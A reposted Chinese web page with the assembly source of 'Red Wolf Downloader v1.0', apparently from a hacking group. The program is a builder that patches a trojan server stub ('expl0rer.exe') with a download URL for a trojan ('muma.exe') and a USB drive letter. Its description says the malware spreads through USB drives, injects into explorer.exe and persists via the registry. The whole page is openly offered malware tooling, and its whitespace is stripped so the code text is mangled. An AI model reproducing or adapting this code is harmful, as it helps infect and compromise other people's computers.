红狼下载者v1.0源代码减小字体增大字体作者：佚名：本站整理发布时间：2007-8-1620:25:04;******************************************************;程序编写byAsm;日期：2006-12-25日凌晨;出处：wwwolfexp/（红狼安全小组）;注意事项：如欲转载，请保持本程序的完整，并注明：;转载自红狼安全小组(wwwolfexp/);******************************************************.386.modelflat,stdcalloptioncasemap:none;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;Include文件定义;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>includewindows.incincludeuser32.incincludelibuser32.libincludekernel32.incincludelibkernel32.libincludeshell32.incincludelibshell32.libModifyFilePROTO:LPSTR;函数声明;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;Equ等值定义;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>ICO_MAINequ1000h;图标DLG_MAINequ1IDC_URLequ1001IDC_Uequ1002IDC_Aboutequ1003IDC_Outequ1004IDC_Wolfequ1005;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;数据段;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.data?hInstancedd?hWindowdd?hFiledd?hMapdd?pMapAddrdd?.dataszUrldb156dup(0)szUdb156dup(0)FileNamedb'expl0rer.exe',0s主题extdb'下载者配制成功！',0szCaptiondb'恭喜',0szCIdb'G:\',0szMumadb'wwwolfexp.exe/muma.exe',0szSurydb'你总该输入点什么东西吧^_^',0szAboutdb'这个下载者通过U盘传播，至于传播的U盘分区则是自己选择，H:\或者G:\，默认是H:\',0dhdb'注入explorer.exe进程，无dll，注册成注册表启动。可能在下个版本设置成系统服务的方式',0dhdb'如果你有什么好的建议，可以到红狼安全小组找我讨论',0dhdb'程序编写byAsm红狼安全小组[C.R.S.T]',0dh,0ah,0s主题itdb'关于工具的一点说明',0szWolfdb'wwwolfexp/',0szErorrdb'没有找到原始服务端，无法进行配置！',0;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>;代码段;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>.code;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>_Processproclocal@stFindFile:WIN32_FIND_DATAinvokeFindFirstFile,addrFileName,addr@stFindFile;查找是否有服务端.ifeax==INVALID_HANDLE_VALUEinvokeMessageBox,NULL,addrszErorr,NULL,MB_OK.elseifinvokeCreateFile,addrFileName,GENERIC_READorGENERIC_WRITE,\;打开它FILE_SHARE_READorFILE_SHARE_WRITE,NULL,OPEN_EXISTING,\FILE_ATTRIBUTE_NORMAL,NULLifeax!=INVALID_HANDLE_VALUEmovhFile,eax;保存句柄invokeCreateFileMapping,hFile,NULL,PAGE_READWRITE,0,0,NULL;建立内存共享.ifeax!=NULLmovhMap,eax;保存句柄invokeMapViewOfFile,hMap,FILE_MAP_WRITE,0,0,NULL;读取内存共享.ifeax!=NULLmovpMapAddr,eax;保存句柄invokeModifyFile,pMapAddr;修改服务端内存里内容invokeUnmapViewOfFile,pMapAddr;解除文件映射.endifinvokeCloseHandle,hMap;关闭内存映射文件.endifinvokeCloseHandle,hFile;关闭文件.endif.endifret_Processendp;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>ModifyFileprocusesebxesiedi,lpBufferAddress:LPSTRmovedi,lpBufferAddress;得到内存地址addedi,0010a0h;得到要写入的U盘分区的地址invokelstrcpy,edi,addrszU;修改edi地址处的内容为szU所保存的xoredi,edi;清空这个edi，免得物理内存地址重复movedi,lpBufferAddress;重新得到内存地址addedi,001a24h;得到要写入的木马的地址invokelstrcpy,edi,addrszUrl;修改edi地址处的内容为szUrl所保存的invokeMessageBox,NULL,addrs主题ext,addrszCaption,MB_OK;提示配置成功retModifyFileendp;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>_ProcDlgMainprocusesebxediesihWnd,wMsg,wParam,lParammoveax,wMsg.ifeax==WM_CLOSEinvokeEndDialog,hWnd,NULL.elseifeax==WM_INITDIALOGinvokeLoadIcon,hInstance,ICO_MAINinvokeSendMessage,hWnd,WM_SETICON,ICON_BIG,eaxinvokeSetDlgItemText,hWnd,IDC_URL,addrszMumainvokeSetDlgItemText,hWnd,IDC_U,addrszCI.elseifeax==WM_COMMANDmoveax,wParam.ifax==IDOKinvokeGetDlgItemText,hWnd,IDC_URL,addrszUrl,sizeofszUrlinvokeGetDlgItemText,hWnd,IDC_U,addrszU,sizeofszUinvokelstrlen,addrszUrl.ifax==NULLinvokeMessageBox,NULL,addrszSury,NULL,MB_OK.elseifcall_Process.endif.elseifax==IDC_AboutinvokeMessageBox,NULL,addrszAbout,addrs主题it,MB_OK.elseifax==IDC_OutinvokeExitProcess,NULL.elseifax==IDC_WolfinvokeShellExecute,0,0,addrszWolf,0,0,SW_SHOW.endif.elsemoveax,FALSEret.endifmoveax,TRUEret_ProcDlgMainendp;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>start:invokeGetModuleHandle,NULLmovhInstance,eaxinvokeDialogBoxParam,hInstance,DLG_MAIN,NULL,offset_ProcDlgMain,NULLinvokeExitProcess,NULL;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>endstart